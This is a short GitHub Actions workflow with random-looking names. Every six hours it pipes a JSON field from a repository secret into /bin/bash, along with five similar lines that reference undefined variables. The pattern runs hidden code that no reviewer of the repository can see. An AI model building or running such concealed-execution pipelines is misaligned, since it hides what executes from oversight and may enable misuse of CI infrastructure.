name: pigmanjerky

on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pigmanjerky
        env:
          tvhd135: ${{ secrets.tvhd135 }}
        run: |
          echo $tvhd135 | jq -r .e9267 | /bin/bash
          echo $orfu524 | jq -r .buas3230 | /bin/bash
          echo $sjzxj39 | jq -r .jxe2518 | /bin/bash
          echo $xs22 | jq -r .nmc31 | /bin/bash
          echo $c61848 | jq -r .k279 | /bin/bash
          echo $yyg17798 | jq -r .rmoct18221 | /bin/bash

